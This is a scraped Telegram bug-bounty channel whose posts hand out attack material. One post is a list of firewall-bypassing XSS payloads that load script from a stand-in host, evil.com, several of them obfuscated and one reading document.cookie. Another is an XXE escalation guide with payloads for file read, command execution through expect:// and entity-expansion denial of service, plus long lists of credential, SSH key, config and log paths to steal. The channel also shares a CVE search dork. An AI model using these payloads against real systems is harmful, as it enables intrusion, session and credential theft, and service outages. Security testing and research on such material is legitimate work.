Brut Security
14.8K subscribers
952 photos
76 videos
290 files
996 links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: [email protected]
Download Telegram
DarkShadow truly remembers all of you:

1. Learn less, practice more.

2. Tools are nothing without core knowledge.

3. Chasing basic bugs won't make you elite.

4. Pro hunters create new exploits, not copy old ones.

5. Think beyond checklists β€” think like an attacker.


Guys, some very interesting topics are coming soon about Advance XSS, leaking credentials to RCE, Google XSS POC, XXE to RCE, and more. Show your love, guys!
❀44πŸ‘5πŸ”₯5🀝2🫑1
CVE-2025-32432: RCE in CraftCMS, 10.0 rating πŸ”₯πŸ”₯πŸ”₯

0-day vulnerability makes some versions of CraftCMS vulnerable to RCE. Used in the wild in combination with CVE-2024-58136.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/XVVPd
πŸ‘‰ Dork: http.headers.x_powered_by:"Craft CMS"

Vendor's advisory: https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3
❀12πŸ‘3πŸ”₯2
⚑️Tired of junk headers or having to scroll in Burp logs?

πŸ”₯Use this Extension: https://github.com/rikeshbaniya/bodyonly
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘10πŸ”₯5
Hello Hunters,
DarkShadow here, back again with a quick tip and a heads-up: you might encounter SSRF vulnerabilities in email-sending features!

Take a look at these screenshots β€” the website actively validates emails to block temporary email addresses. However, when I used Burp Collaborator as the email input, I received DNS, SMTP, and even HTTP responses!

This demonstrates that during pentesting, instead of relying on temporary mail services, you should always use Burp Collaborator to uncover hidden vulnerabilities.

Stay sharp and hunt smarter!

Follow meπŸ‘‰πŸΌ DarkShadow

#bugbountytips@brutsecurity #ssrf
πŸ—Ώ12πŸ‘10❀9πŸ”₯7
Reflected XSS in cPanel - tracked as CVE-2023-29489 πŸ”₯
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ€”16πŸ‘9πŸ”₯6
πŸ—Ώ
🀣22πŸ”₯5πŸ‘4😁1😒1
This media is not supported in your browser
VIEW IN TELEGRAM
😁
😁11🀣6πŸ‘3
Hey Hunters,
DarkShadow hereβ€”dropping a quick tip for your next XSS hunt!

Tired of firewalls blocking alert(), prompt(), or confirm()? Use import() to level up your payload game.

Try these sneaky XSS payloads:

import('data:text/javascript;base64,YWxlcnQoJ1hTUyEnKQ==')  
// Base64 β†’ alert('XSS!')

import('data:text/javascript,%61lert(document.cookie)')  
// %61 = 'a'


Blind Payloads:
<script type="module">import('https://evil.com/payload.js');</script>

<img src=x onerror="import('https://evil.com/payload.js')">

<svg/onload="import('https://evil.com/payload.js')">

(()=>{import('https://evil.com/payload.js')})()

import(/*trick*/'https://evil.com/payload.js')



Encoded Variants:
\u0069\u006d\u0070\u006f\u0072\u0074('https://evil.com/payload.js')  
// import as Unicode encoding

<script>import(String.fromCharCode( 104,116,116,112,115,58,47,47,101,118,105,108,46,99,111,109,47,112,97,121,46,106,115));</script>  
// https://evil.com/pay.js ASCII decimal encoding


Evil Payload.js Example:
export function pwn() {
  alert('DarkShadow is here!');
}



Hope these payloads help you understand how to bypass firewalls that block your payloads, even when an XSS vulnerability still exists. However, their effectiveness depends on the specific web application and firewall configurations you're testing against.

Want a full XSS WAF Bypass Cheat Sheet? Let me know in the commentsβ€”I'll cook one up!

Follow me πŸ‘‰πŸΌ DarkShadow

#bugbountytips #xss #wafbypass
πŸ”₯22πŸ‘8❀5🀝1
😁
🀣38πŸ—Ώ12πŸ‘4❀1πŸ‘1
🀣57
Certified Red Team Professional (CRTP) - Notes
πŸ“πŸ”₯
πŸ”—https://dev-angelist.gitbook.io/crtp-notes
πŸ‘19
πŸ”–Extracting endpoints from JavaScript bookmarklets
⬇️Usage
πŸ”΄Add a new bookmark in your browser’s toolbar
πŸ”΄Replace the bookmark’s URL with the following JavaScript code:

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

πŸ”΄Visit the target page and click the bookmarklet. The script will run in your browser, revealing previously undiscovered endpoints right on the page.
Please open Telegram to view this post
VIEW IN TELEGRAM
❀25πŸ‘9🀝1🫑1
Hey everyone!
Sorry for not being active latelyβ€”been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.

Stay tuned and take care!
β€” Saumadip | Brut Security
❀14πŸ‘3
πŸ”₯XXE to Remote Code Execution (RCE) – Real-World Attack Chain⚑

Hey Hunters,
DarkShadow hereβ€”dropping a quick tip for your next XXE hunt!

Escalate XXE vulnerability 😏

1. Basic XXE Payload (Test Injection)


<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
If the response contains /etc/passwd, the app is XXE vulnerable.


2. RCE via expect:// PHP Wrapper (if enabled)

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>
ο»Ώ
Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).


3. Local File Read using php://filter

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>

Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective to bypass WAF filters and got any outputs correct format)


4. XML Bomb (DoS)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>

Effect: Crashes or DoS the XML parser due to entity expansion.

5. Read User Private Keys (SSH)

Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)

πŸ›‘Pro tip for more recon:

1. Steal AWS / Cloud Credentials via XXE

Also check:
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
2. Dump Configs for DB Creds or Secrets

Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)

3. Bash History Abuse

Also check:
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
4. Read Logs for Token Harvesting


Web Server Logs:

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log

PHP / App-Specific Logs:

/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log

Laravel / Symfony / Framework Logs:

storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog

System Logs (May Contain Leaks or Stack Traces):

/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log

Database Logs (If Exposed):

/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log


5. Custom Internal Recon via /proc Files

Also check:
/proc/self/cmdline
/proc/self/fd/

Sometimes exposes secrets in memory or open database connections.

So guys what about my these methodology? If you guy's are really enjoyed, don't forget to show your love ❀️

Don't forget to follow me πŸ‘‰πŸΌ DarkShadow

#bugbountytips #xxe
πŸ‘19❀15πŸ”₯7🀨1🀝1
πŸ”₯A new tool that reads reconftw results and uses a local LLM (Ollama) to generate actionable reports: bughunter, executive, or brief.

It’s lightweight, fast, and helps turn raw recon into insights.

πŸ’₯https://github.com/six2dez/reconftw_ai
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10πŸ”₯6πŸ‘4